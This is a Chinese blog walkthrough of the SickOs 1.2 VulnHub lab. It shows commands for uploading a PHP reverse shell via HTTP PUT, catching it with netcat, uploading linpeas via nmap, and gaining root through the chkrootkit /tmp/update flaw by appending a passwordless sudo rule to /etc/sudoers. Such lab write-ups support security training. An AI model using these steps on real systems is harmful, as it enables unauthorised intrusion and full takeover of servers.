vulnhub SickOs: 1.2

最新推荐文章于 2024-03-21 22:23:42 发布
最新推荐文章于 2024-03-21 22:23:42 发布
阅读量2.6k 收藏 1
点赞数 2
分类专栏: vulnhub 文章标签: PUT chkrootkit 定时任务 安全 linux提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/122463492
版权

渗透思路:

nmap扫描---->dirb扫描---->通过PUT方法上传php反弹shell---->利用chkrootkit漏洞提权

环境信息:

靶机ip:192.168.101.39

攻击机ip:192.168.101.34

具体步骤:

步骤1:nmap扫描

sudo nmap -sS -A -p- 192.168.101.39

扫描到22端口(ssh)和80端口(http)

步骤2:dirb扫描网站目录

dirb http://192.168.101.39

除了网站主目录http://192.168.101.39/index.php,只扫到一个目录http://192.168.101.39/test/

访问一下网站主目录,发现就一张图,查看源代码也没什么线索

访问一下 http://192.168.101.39/test/发现是一个目录,目录是空的,另外还印证了一下nmap扫描结果,网站服务器是lighttpd 1.4.28。

步骤3:通过PUT方法上传php反弹shell

在网上找到的lighttpd 1.4.28历史漏洞没有getshell的,但我想或许可以通过目录遍历漏洞来获取什么敏感文件信息,里面或许有线索。尝试了许久,没有成功。

后来尝试访问http://192.168.101.39和http://192.168.101.39/test/的时候,burpsuite抓包,并将请求报文中的请求方法从GET换成PUT,只要这两个url中有支持PUT方法的,就可以上传shell。

http://192.168.101.39的请求报文的请求方法换成PUT之后,返回报文和GET的完全一样,尝试在url之后加文件名,比如http://192.168.101.39/shell.php,则会报404。这恐怕不行。

http://192.168.101.39/test/的请求报文中,先把请求方法换成OPTIONS(虎一点也可以省略这步),可以确定这个url是支持PUT方法的。

接下来修改请求报文,请求方法修改为PUT,url修改为 http://192.168.101.39/test/shell.php,请求头下面空一行,把kali linux上的/usr/share/webshells/php/php-reverse-shell.php的内容复制进来,改一下$ip和$port(分别改成攻击机ip和监听端口)。

发送之后再访问http://192.168.101.39/test/,发现该目录下已经有了一个文件shell.php

攻击机上用nc监听2333端口

nc -nlvp 2333

访问 http://192.168.101.39/test/shell.php 触发反弹shell,没想到居然失败啦…………

换了好几个端口号,最后发现监听443端口的时候能成功

nc -nlvp 443

访问 http://192.168.101.39/test/shell4.php 触发反弹shell

反弹shell中输入以下命令,得到交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

步骤4:利用chkrootkit漏洞提权

传输提权检测脚本linpeas.sh的时候遇到了问题,用步骤3中的方法,也就是通过burpsuite上传的linpeas.sh运行时报错。

而由于之前已经发现靶机连接很多外部端口是不允许的,因此用wget也不大行。

而通过curl命令上传linpeas.sh的时候,由于curl会先发送一个带Expect头的报文,而lighttpd不支持这个头,因此无法上传成功。

curl -v -X PUT -T /home/kali/linpeas.sh http://192.168.101.39/test/linpeas.sh

 最后现学了一个方法,通过nmap上传,终于上传成功了

sudo nmap -p 80 192.168.101.39 --script http-put --script-args http-put.url='/test/linpeas.sh',http-put.file='linpeas.sh'

上传成功后,在靶机的/var/www/test目录下执行以下命令,使linpeas.sh可执行。

chmod +x linpeas.sh

然后执行linpeas.sh

./linpeas.sh

linpeas.sh也没找到啥一眼看上去就有利用空间的东西……

定时任务这块,一堆绿色(正常)的中间有三个白色的,似乎有点东西

在攻击机上用searchsploit把这三个的exploit都search一遍,apt-xapian-index的没找到,lighttpd的没有本地提权相关的漏洞,chkrootkit倒是有

searchsploit chkrootkit

版本要求0.49。

靶机上查询 chkrootkit 版本,发现靶机上的chkrootkit的版本是0.49,这不是巧了

chkrootkit -V

我们用33899.txt那个exploit,找一下它在本地的存储位置

searchsploit -p 33899.txt

 

 看一下它的内容

cat /usr/share/exploitdb/exploits/linux/local/33899.txt

 有教手工利用的方法:

在/tmp文件夹下新建一个名为update的文件,并以root的身份执行chkrootkit,那么/tmp/update就会被root用户执行。

看到一种比较方便的利用方法,是在/tmp/update中写入修改/etc/sudoer文件的内容,使www-data用户可以免密码以任何用户的身份执行sudo命令。

具体命令如下,其中chmod 444 /etc/sudoers只是为了方便观察/tmp/update是否被执行(因为 /etc/sudoers原本的权限是440),提权成功后记得把权限改回来

echo 'echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 444 /etc/sudoers' > /tmp/update

查看一下 /tmp/update的内容

给 /tmp/update 可执行权限

chmod +x /tmp/update

很快,/etc/sudoers的权限就变成444了

执行

sudo su

发现报错。原来sudoer的权限必须是0440啊……

那再把sudoer的权限改回来

echo 'echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

很快(不到一分钟),执行 sudo su就可以获得root权限,flag在/root/7d03aaa2bf93d80040f3f22ec6ad9d5a.txt中

后记:

我有个疑惑,为啥exploit准备好之后,不到一分钟就实现提权了呢?

如果是执行的/etc/cron.daily/chkrootkit,那按照靶机的配置应该是每天早上执行一次

所以我仔细看了一下 /etc/cron.daily/chkrootkit 的内容,配合/etc/chkrootkit.conf,发现/etc/cron.daily/chkrootkit实际上根本不会被执行

 

突然想起来,提权之前/etc/cron.d是没有权限查看的,因此在root权限下又执行了一遍

ls -al /etc/cron*

确实, /etc/cron.d下面还有个chkrootkit

果然是这货在每分钟执行一次chkrootkit

 

仙女象
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub】---SickOS1.2靶机
qq_43168364的博客
08-22 400
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:靶机(192.168.15.) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 命令:arp-scan -l 端口扫描 命令:masscan --rate=10000 --ports 0-65535 19
靶机渗透练习39-SickOs2
hirak0的博客
04-18 844
靶机描述 靶机地址:https://www.vulnhub.com/entry/sickos-12,144/ Description About Release Name........: SickOs1.2 Date Release: 26 Apr 2016 Author......: D4rk Series......: SickOs Objective...: Get /root/7d03aaa2bf93d80040f3f22ec6ad9d5a.txt Tester(s)...: h1tch1, E
VulnHub渗透测试实战靶场 - SICKOS: 1.1
LYJ20010728的博客
08-08 1863
VulnHub渗透测试实战靶场 - SICKOS: 1.1环境下载SICKOS: 1.1靶机搭建渗透测试信息搜集 环境下载 戳此进行环境下载 SICKOS: 1.1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l ...
VulnHub-SickOs1.1
热门推荐
江左盟的博客
07-07 1万+
信息收集 使用 漏洞发现 漏洞利用
Vulnhub靶机SickOs1.1渗透
xingjinhao123的博客
02-26 308
靶机介绍 官方下载地址:https://www.vulnhub.com/entry/sickos-11,132/ 目标是获取root目录下的a0216ea4d51874464078c618298b1367.txt文件 发布日期是2015年11月 运行环境: 靶机:网络连接方式设为自动桥接,IP地址:192.168.1.76 攻击机:通网段下的kali linux,IP地址:192.168.1.44 开始渗透 运行靶机 获取靶机IP地址 扫描端口,没有发现熟悉的80端口 使用nikto简单扫一下312
vulnhub靶场-sickos1.2
zzzzzzkeai的博客
12-08 271
vulnhub靶场--sickos1.2靶场
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
SickOS 1.2 简单的 凯夫吉尔 米尔内特 牛头怪 空字节 VulnOS:1 VulnOS:2.0 新鲜地 塞德纳 恶梦 奥库斯 比卢:B0x 莫里亚1.1 Lazysys管理员 斗牛犬 BTRSys:DV 2.1 BTRSys 1 难以置信地容易 狄娜 Born2Root...
CTF-Difficulty:此备忘单旨在面向CTF玩家和初学者,帮助他们根据难度对CTF挑战进行分类
05-28
跟着我们目录简单的 操作系统-2.0 DE-ICE:S1.120 Hackademic-RTB1 Tr0ll 1 21 LTR:场景1 Kioptrix:1.1级Kioptrix:1.2级Kioptrix:1.3级Kioprtix:5 安全操作系统:1 订书机SickOS 1.1 SickOS 1.2 简单的凯夫吉尔...
pokemon-gpt-2
04-23
对于那些想要在本地运行此代码的人(sickos!),以下是关键文件的简要说明: image - to - text.py-将图像转换为基于文本的格式以进行训练。 text- to - image.py-将基于文本的图像格式转换为PNG。 train.py-用...
Vulnhub 靶机渗透:SICKOS: 1.2
Mysmycbx的博客
06-07 945
使用curl -X OPTIONS查看网站能够使用哪些请求方式,然后使用PUT进行上传恶意文件,例如一句话木马,反弹shell等。反弹shell时,尝试多个shell,bash,pyhton等。定时任务不止一个路径,/etc/crontab, 还有/etc/cron* ,包含/etc/cron.d,/etc/cron.daily等。定时任务里发现应用,一定要搜相关漏洞,搜到后综合多个poc进行利用。
Vulnhub-SickOs:1.2
cr7lyl的博客
09-11 994
记一次Vulnhub-SickOs1.2渗透过程
sickOS1.2靶机(超详细)!
qq_68868384的博客
08-16 270
正常模式是默认的,所以-T3什么也不做。看到这个页面把目录下的文件都显示的出来,那么我们看看能不能上传文件,在页面上是没有上传文件的地方,那么我们看一下这个URL支持的请求有哪几种方法,我们可以看到它容许put请求,那试一下put文件上传漏洞可不可行。用burp进行抓包,然后修改它的数据,先尝试一下,让它输出一个phpinfo的页面出来,发现成功了,那么接下来我们就可以上蚁剑了,将蚁剑的木马写入到目标服务器中。注:dir:使用文件/目录枚举模式,-w:指定字典,-x:扫描文件时的后缀名,-u:url地址,
靶机渗透SickOs1.2(非常详细,适合新手渗透)
君莫hacker的博客
09-08 7017
靶机HACKME:2的目录0x01靶机描述 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/sickos-12,144/ 作者 D4rk 发布日期 2016年4月27日 难度 中等 靶机基本介绍: 这是SickOs后续系列中的第二个,独立于以前的版本,挑战的范围是在系统上获得最高权限。 ...
Vulnhub靶机:SickOs1.2
最新发布
qq_48904485的博客
03-21 730
运行环境:Virtualbox攻击机:kali(10.0.2.4)靶机:SickOs 1.2(10.0.2.15)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/sickos-12,144/
vulnhub靶场渗透之SickOs1.2渗透教程(超级详细)
旺仔Sec&blog
05-30 1903
靶机下载链接作者D4rk发布日期2016年4月27日难度中等这是SickOs后续系列中的第二个,独立于以前的版本,挑战的范围是在系统上获得最高权限1、这个靶场主要考察的是支持http协议,PUT方法等2、然后就是使用多种反弹shell的方法,不过就是这里设置了规则反弹shell的端口3、最后就是靶机的提权,多多浏览靶机内的可疑文件,结合exp库来实现最终提权的目的。
Vulnhub | DC: 9 |【实战】
bin789456的博客
09-19 351
靶场链接:DC系列,有些知识点在DC:1中提到,可以翻阅恭喜你,DC_9是DC系列的最后一个靶场,你已经刷完DC系列了,推荐你看最后的DC篇总结。
SickOs1.2靶场练习&小白详解&计划任务提权&chkrootkit提权
jockerboss的博客
03-07 1042
SickOs1.2靶场渗透详解&小白入门&计划任务提权&chkrootkit提权
【甄选靶场】Vulnhub百个项目渗透——项目十三:SickOs 1.2(防火墙绕过,计划任务写入)
人间体佐菲的博客
09-15 743
web安全,网络安全,渗透测试,信息安全,网络空间安全
靶机实战-SickOs1.2
滕财然的博客
01-27 367
SickOs1.2靶机实战 文章目录SickOs1.2靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问80端口--http服务Getshell方式一Getshell方式二5、提权方式一方式二方法三//这一个方法我没成功,你们可以尝试一下 1、主机发现 arp扫描 目标IP:192.168.232.161 2、端口扫描 目标开放80、22端口 3、端口详细信息扫描 4、访问80端口...
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值